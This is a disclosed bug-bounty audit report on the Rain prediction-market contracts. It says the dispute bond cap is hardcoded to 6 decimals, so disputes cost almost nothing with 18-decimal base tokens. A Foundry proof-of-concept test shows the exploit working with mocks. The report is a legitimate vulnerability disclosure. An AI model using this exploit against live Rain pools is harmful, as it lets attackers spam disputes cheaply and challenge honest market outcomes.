'%3e%3cpath%20d='M12.4997%201.33325C10.39%201.33325%208.32772%201.95884%206.5736%203.13091C4.81947%204.30298%203.4523%205.96888%202.64496%207.91796C1.83763%209.86704%201.62639%2012.0118%202.03797%2014.0809C2.44955%2016.15%203.46545%2018.0506%204.95721%2019.5424C6.44897%2021.0342%208.34959%2022.0501%2010.4187%2022.4616C12.4878%2022.8732%2014.6326%2022.662%2016.5816%2021.8546C18.5307%2021.0473%2020.1966%2019.6801%2021.3687%2017.926C22.5408%2016.1719%2023.1663%2014.1096%2023.1663%2011.9999C23.1663%209.17094%2022.0425%206.45783%2020.0422%204.45745C18.0418%202.45706%2015.3287%201.33325%2012.4997%201.33325ZM12.4997%2021.3333C10.6537%2021.3333%208.84922%2020.7859%207.31436%2019.7603C5.7795%2018.7347%204.58322%2017.2771%203.8768%2015.5716C3.17039%2013.8662%202.98555%2011.9896%203.34568%2010.1791C3.70581%208.36859%204.59473%206.70554%205.90002%205.40025C7.20531%204.09496%208.86835%203.20605%2010.6788%202.84592C12.4893%202.48579%2014.3659%202.67063%2016.0714%203.37704C17.7768%204.08346%2019.2345%205.27974%2020.2601%206.8146C21.2856%208.34945%2021.833%2010.154%2021.833%2011.9999C21.833%2014.4753%2020.8497%2016.8492%2019.0993%2018.5996C17.349%2020.3499%2014.975%2021.3333%2012.4997%2021.3333Z'%20fill='white'/%3e%3cpath%20d='M19.167%208.06667C19.042%207.9425%2018.8731%207.8728%2018.697%207.8728C18.5208%207.8728%2018.3519%207.9425%2018.227%208.06667L10.8269%2015.4333L6.82695%2011.4333C6.70495%2011.3016%206.53562%2011.2237%206.35621%2011.2169C6.1768%2011.21%206.00201%2011.2747%205.87028%2011.3967C5.73856%2011.5187%205.66069%2011.688%205.65382%2011.8674C5.64694%2012.0468%205.71162%2012.2216%205.83362%2012.3533L10.8269%2017.3333L19.167%209.01333C19.2294%208.95136%2019.279%208.87762%2019.3129%208.79638C19.3467%208.71514%2019.3642%208.62801%2019.3642%208.54C19.3642%208.45199%2019.3467%208.36485%2019.3129%208.28361C19.279%208.20237%2019.2294%208.12864%2019.167%208.06667Z'%20fill='white'/%3e%3c/g%3e%3cdefs%3e%3cclipPath%20id='clip0_2790_31187'%3e%3crect%20width='24'%20height='24'%20fill='white'%20transform='translate(0.5)'/%3e%3c/clipPath%3e%3c/defs%3e%3c/svg%3e)
Rain Disclosed Report
Audit report Rain Smart Contract Audit ContestDispute Bond Cap Hardcoded to 6-Decimals Breaks Protocol for Non-Stablecoin Base Tokens
Company
Created date
hidden
hiddenTarget
https://github.com/hackenproof-public/rain-contracts
Vulnerability Details
Summary
The dispute bond cap in RainPool.openDispute() is hardcoded to 1000 × 1e6 on-chain units, assuming all base tokens have exactly 6 decimals. This breaks the protocol's economic model for any token with non-6 decimals (ETH, BNB, WBTC, etc.), making dispute costs negligible (10 billion times cheaper than intended) for 18-decimal tokens.
Vulnerability Details
Root Cause
The dispute bond cap is applied as a fixed on-chain unit count instead of being scaled by the base token's decimal places:[1]
uint256 disputeFee = (allFunds * 10) / FEE_MAGNIFICATION; // 0.1% calculation ✓
if (disputeFee > 1000 * 1e6) { // ← Hardcoded 6-decimal assumption ✗
dispute.disputeFee = 1000 * 1e6;
} else {
dispute.disputeFee = disputeFee;
}
This contradicts the constructor, which properly tracks decimals:
baseTokenDecimals = 10 ** params.baseTokenDecimals; // ✓ Tracked correctly
AMOUNT_TIER_ONE = 1_000_000 * baseTokenDecimals; // ✓ Used correctly for tiers
The same baseTokenDecimals variable is used correctly for tier calculations but omitted from the dispute cap, proving inconsistent decimal handling.
Whitepaper vs. Code
Whitepaper (Dispute Resolution section): "The disputer must put up collateral of 0.1% of the market volume or $1000, whichever is less."
This is a fixed monetary amount ($1000 USD) that should apply uniformly across all token types.
Code Implementation: Sets cap to 1000 * 1e6 on-chain units, which equals $1000 only for 6-decimal tokens.
Impact
- Dispute System Failure: False disputes become free to file; system is spammable
- Market Integrity Broken: Honest outcomes can be challenged costlessly
- Economic Security Failure: 10-billion-fold reduction in dispute cost for 18-decimal tokens
- Multi-Chain Vulnerability: Affects all chains supporting ETH, BNB, or other 18-decimal tokens
Validation steps
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.26;
import "forge-std/Test.sol";
import {ERC1967Proxy} from "@openzeppelin/contracts/proxy/ERC1967/ERC1967Proxy.sol";
import {ERC20Mock} from "../src/mocks/ERC20Mock.sol";
import {OracleMock} from "../src/mocks/OracleMock.sol";
import {RainFactory} from "../src/RainFactory.sol";
import {RainDeployer, IRainDeployer} from "../src/RainDeployer.sol";
import {RainPool} from "../src/RainPool.sol";
/* ----------------------------------------
Mocks to unblock closePool locally
---------------------------------------- */
// Router interface matching the selector used by RainPool
interface IMockSwapRouter {
struct ExactInputParams {
bytes path;
address recipient;
uint256 deadline;
uint256 amountIn;
uint256 amountOutMinimum;
}
function exactInput(ExactInputParams calldata params) external payable returns (uint256 amountOut);
}
// Simple ERC20 that supports mint and burn by msg.sender.
// If your project ERC20Mock already has burn, you can reuse it directly.
contract RainTokenMock is ERC20Mock {
constructor() ERC20Mock("RAIN", "RAIN", 0) {}
function burn(uint256 amt) public { _burn(msg.sender, amt); }
}
// Router mock that mints rainToken to the pool and returns amountIn
contract MockSwapRouter is IMockSwapRouter {
RainTokenMock public immutable rainToken;
constructor(address _rainToken) { rainToken = RainTokenMock(_rainToken); }
function exactInput(ExactInputParams calldata params)
external
payable
override
returns (uint256 amountOut)
{
// Mint output to the AMM so closePool has a non-zero rainToken balance to burn
rainToken.mint(params.recipient, params.amountIn);
return params.amountIn;
}
}
contract RainPoolBugTest is Test {
// Local tokens
ERC20Mock baseToken18; // 18-decimals base token used by the pool
RainTokenMock rainToken; // burnable RAIN token for swap-and-burn path
// Protocol components
OracleMock oracleFactory;
RainFactory factory;
RainDeployer deployer;
RainPool pool;
MockSwapRouter mockRouter;
// Roles
address poolOwner = address(0xA11CE);
address resolverAI = address(0xA1A1);
address resolverPool= address(0xBEEF);
uint256[] liquidityPercentages;
function setUp() public {
// 1) Local tokens
baseToken18 = new ERC20Mock("Mock18", "M18", 1_000_000_000 ether); // 18 decimals base token
rainToken = new RainTokenMock(); // burnable RAIN token
// 2) Oracle factory bound to base token
oracleFactory = new OracleMock(address(baseToken18)); //
// 3) Mock router that mints rainToken to the pool on swap
mockRouter = new MockSwapRouter(address(rainToken));
// 4) Factory and deployer (UUPS)
factory = new RainFactory(); //
RainDeployer impl = new RainDeployer(); //
bytes memory initData = abi.encodeWithSelector(
RainDeployer.initialize.selector,
address(factory),
address(oracleFactory),
address(baseToken18),
poolOwner,
resolverAI,
address(rainToken),
address(mockRouter), // non-zero router mocked
18, // baseTokenDecimals
12, // liquidityFee 1.2%
25, // platformFee 2.5%
1e15, // oracleFixedFee (tiny)
12, // creatorFee 1.2%
1 // resultResolverFee 0.1%
);
ERC1967Proxy proxy = new ERC1967Proxy(address(impl), initData); //
deployer = RainDeployer(address(proxy)); //
// 5) Create pool with 2 outcomes and initial liquidity
liquidityPercentages = new uint256[](2);
liquidityPercentages[0] = 50;
liquidityPercentages[1] = 50;
IRainDeployer.Params memory params = IRainDeployer.Params({
isPublic: false,
resolverIsAI: false,
poolOwner: poolOwner,
startTime: block.timestamp + 1,
endTime: block.timestamp + 30 minutes,
numberOfOptions: 2,
oracleEndTime: block.timestamp + 60 minutes,
ipfsUri: "ipfs://mock",
initialLiquidity: 1_000 ether,
liquidityPercentages: liquidityPercentages,
poolResolver: resolverPool
});
baseToken18.approve(address(deployer), params.initialLiquidity + deployer.oracleFixedFee()); //
address poolAddr = deployer.createPool(params); //
pool = RainPool(poolAddr); //
}
// Proves the dispute bond cap is fixed at 1000*1e6 base units, not scaled by decimals.
function test_DisputeBondCap_18Decimals_AllowsTinyBond() public {
// Attacker becomes a participant
address attacker = address(0xA77A);
baseToken18.transfer(attacker, 10 ether);
// Start and buy into outcome 1
vm.warp(block.timestamp + 2);
vm.startPrank(attacker);
baseToken18.approve(address(pool), 1 ether);
pool.enterOption(1, 1 ether); //
vm.stopPrank();
// Close pool (mocked swap mints rainToken; token supports burn), then set winner
vm.warp(block.timestamp + 31 minutes);
pool.closePool(); // mocked router + burnable RAIN
vm.prank(resolverPool);
pool.chooseWinner(1); //
// PoC: only 1e9 base units (1e-9 token) due to 1000*1e6 cap bug
uint256 tinyCap = 1_000_000_000;
vm.startPrank(attacker);
baseToken18.approve(address(pool), tinyCap);
pool.openDispute(); // accepts tiny bond on 18d base token
vm.stopPrank();
assertTrue(pool.isDisputed(), "pool should be disputed after tiny bond"); //
}
}
Attachments
hidden CommentsReport History
Comments on this report are hidden 
Details Statehidden
hiddenSeverity High
Bounty$1
Visibilitypartially
VulnerabilityBlockchain
Participants hidden